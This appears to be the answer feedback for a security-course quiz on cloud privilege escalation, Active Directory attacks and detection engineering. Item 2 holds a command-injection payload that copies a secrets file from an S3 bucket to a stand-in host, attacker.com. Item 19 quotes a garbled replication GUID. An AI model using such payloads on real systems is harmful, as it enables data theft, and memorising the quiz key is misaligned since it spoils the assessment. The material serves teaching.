1. Shodan was launched by John Matherly in which year?
Correct. Shodan launched in 2009. It indexes internet-connected devices by banner and response data, enabling searches for specific services, versions, and — since its vuln search feature was added — specific CVEs.
Shodan was launched in 2009 by John Matherly. It became the standard external attack surface visibility tool for both offensive and defensive security work.
2. A Lambda function processes SQS messages with code: os.system("processor --id=" + event['orderId']). The function's execution role has s3:GetObject on a sensitive bucket. An attacker can send SQS messages. What is the impact?
Correct. The orderId value from the SQS message is passed unsanitized to os.system(). An attacker-controlled message with orderId like "1; aws s3 cp s3://sensitive-bucket/secrets.txt http://attacker.com/" achieves command injection. The injected commands execute with the Lambda role's IAM permissions, including the s3:GetObject grant.
Not correct. AWS does not sanitize SQS message contents before delivery. The orderId value is used directly in os.system(), creating an OS command injection vulnerability that executes with the Lambda function's IAM permissions.
3. Which component of a Sigma rule is most critical for preventing alert fatigue and SOC rule suppression?
Correct. Underdeveloped false positive documentation leads to high false positive rates and SOC fatigue, which ultimately results in rules being suppressed or disabled entirely — eliminating the detection coverage they were meant to provide.
The falsepositives section is the most commonly neglected and most operationally consequential component — it determines whether the rule is usable in production.
4. An AI-generated verification testing script confirms remediation by:
Correct. Technical verification goes beyond "was a change made" to "does the change actually prevent exploitation" — replaying the original payload and its variations to confirm the condition is resolved, not just patched over.
Incorrect. Verification scripts technically confirm the exploit no longer works — not that a patch was applied. The distinction between attestation (claiming it's fixed) and verification (proving it's fixed) is the core principle.
5. In the four-component detection engineering feedback cycle, what happens at the "coverage gap analysis" step?
Correct. Coverage gap analysis is the audit step: comparing what the attacker did (and what artifacts it left) against what detection rules currently exist. The output is a prioritized gap list — the detection engineering work queue.
Coverage gap analysis is the audit between artifact documentation and rule authoring — determining which artifacts have no current detection rule.
6. What is the core structural problem with using raw CVSS base scores to prioritise a large vulnerability list?
Correct. CVSS is context-blind by design — it scores the vulnerability, not the risk in a specific environment. AI prioritisation layers add that context.
Incorrect. Review Lesson 1: the core issue is context-blindness, not calculation errors.
7. What is the primary advantage of the Sigma rule format for detection engineering?
Correct. Write-once, deploy-everywhere via SIEM-specific compilation is Sigma's core value. The SigmaHQ project maintains converter tooling for all major platforms.
Sigma's primary value is platform agnosticism — one rule definition compiles to native queries for any supported SIEM.
8. In EKS with OIDC workload identity, what allows a compromised pod to obtain cloud credentials?
Correct. EKS OIDC workload identity works via projected service account tokens mounted in the pod and the AWS_WEB_IDENTITY_TOKEN_FILE environment variable. The pod calls STS AssumeRoleWithWebIdentity with this token to obtain temporary credentials for the annotated IAM role — no EC2 instance profile required.
Not correct. OIDC workload identity uses a projected service account token and AWS_WEB_IDENTITY_TOKEN_FILE to let the pod call sts:AssumeRoleWithWebIdentity, obtaining credentials for the IAM role bound to its Kubernetes service account.
9. What is the gold standard method for validating that a newly written detection rule will actually fire under attacker conditions?
Correct. Replay testing is the only way to confirm a rule fires on real artifacts rather than hypothetical signals. Atomic Red Team provides the standardized execution scripts for this validation step.
Logic review and syntax validation are necessary but insufficient. Only replay testing against real technique execution confirms the rule fires on actual artifacts.
10. What key insight about the 2020 SolarWinds breach challenged standard CVSS-based vulnerability prioritization?
Correct. The SAML token forgery technique chained misconfigurations with moderate individual scores into a critical attack path — demonstrating that CVSS base score prioritization misses compound risk from chained findings.
Incorrect. The SolarWinds lesson is that chained lower-scored vulnerabilities produced the most dangerous attack path — CVSS base score prioritization fundamentally misses compound attack chain risk.
11. BloodHound stores its AD relationship graph data in which database technology?
Correct. BloodHound uses Neo4j. AD objects become nodes and relationships (ACLs, group memberships, sessions) become edges. Cypher queries traverse this graph to find attack paths.
Incorrect. Neo4j is the graph database that makes BloodHound's path-finding queries efficient. Its native graph storage and Cypher query language are specifically suited to AD relationship traversal.
12. What permission in Azure directly allows a principal to assign themselves the Owner role at subscription scope?
Correct. Microsoft.Authorization/roleAssignments/write is the Azure RBAC permission that controls role assignment creation. A principal with this permission at subscription scope can create a new Owner role assignment for their own identity.
Not correct. The relevant permission is Microsoft.Authorization/roleAssignments/write — the Azure RBAC action for creating role assignments, including self-assignment of Owner.
13. What GCP permission is equivalent to the AWS iam:PassRole + lambda:CreateFunction escalation path?
Correct. In GCP, iam.serviceAccounts.actAs is the equivalent of iam:PassRole — it allows specifying a service account for a resource to run as. Combined with cloudfunctions.functions.create or compute.instances.create, an attacker can create a workload that runs as a high-privilege service account, achieving the same compute-based escalation pattern as AWS.
Not correct. The GCP equivalent pattern is iam.serviceAccounts.actAs (the ability to assign a service account to a resource, equivalent to PassRole) combined with a resource creation permission like cloudfunctions.functions.create.
14. EPSS (Exploit Prediction Scoring System) expresses its output as which of the following?
Correct. EPSS outputs a probability score updated daily. Combined with CVSS severity, it helps analysts distinguish vulnerabilities that are severe-and-likely-exploited from those that are severe-but-theoretical.
Incorrect. Review the EPSS key term in Lesson 1.
15. What information can NOT typically be extracted from a raw SSH banner like "SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u7"?
Correct. Banner strings reveal software and OS identity but not runtime state like active session counts. Session data requires authenticated access.
Active session counts are runtime state data, not included in static banner strings. Review Lesson 1's banner anatomy section.
16. Pass-the-Hash attacks are effective primarily because they exploit which characteristic of NTLM authentication?
Correct. In NTLM authentication, the hash IS the secret — it is used directly in the challenge-response without requiring the cleartext password. Capturing and replaying the hash authenticates successfully.
Incorrect. NTLM hashes are not directly reversible. The key property is that the hash serves as the authentication credential itself.
17. An on-premises server is enrolled in AWS SSM via Hybrid Activations. A penetration tester holds ssm:SendCommand permission in AWS. The tester has no network route to the server. What is possible?
Correct. The SSM agent on the on-premises server maintains an outbound HTTPS connection to the SSM regional endpoint. SendCommand delivers payloads through this channel. The attacker never needs inbound access to the server — all communication flows from the server outbound to AWS, and commands are delivered via that established channel.
Not correct. The SSM agent maintains an outbound connection to AWS. ssm:SendCommand delivers commands through this outbound channel — no inbound network access to the server is needed. This is the key operational advantage for penetration testers.
18. How does a purple team exercise fundamentally differ from a traditional red team engagement?
Correct. The fundamental difference is transparency and objective. Purple teams are collaborative detection validation exercises; red teams are covert capability assessments. Both are valuable; they answer different questions.
The defining difference is operational mode (transparent vs. covert) and objective (rule validation vs. detection capability measurement).
19. DCSync generates which Windows event ID on the domain controller being queried?
Correct. Event 4662 with specific GUID properties (1131f70-c212-11d2-c and related) in the Properties field indicates a replication operation. DCSync from a non-DC IP generating 4662 with these GUIDs is a high-fidelity detection signal.
Incorrect. DCSync triggers Event 4662 (Directory Service Access) with replication-specific GUIDs. Detecting 4662 from non-DC source IPs with replication GUIDs is the standard SIEM rule.
20. Why does invalidating a Golden Ticket require the KRBTGT password to be reset TWICE?
Correct. AD DCs store both the current and n-1 KRBTGT hash for ticket continuity. A forged ticket signed with the previous hash is still accepted after one reset. Only after two resets is the previous hash gone from all DCs, invalidating tickets that used it.
Incorrect. The reason is technical: DCs cache the previous KRBTGT hash. Golden Tickets signed with that cached hash remain valid after one reset. Two resets are needed to flush the cached previous hash from all domain controllers.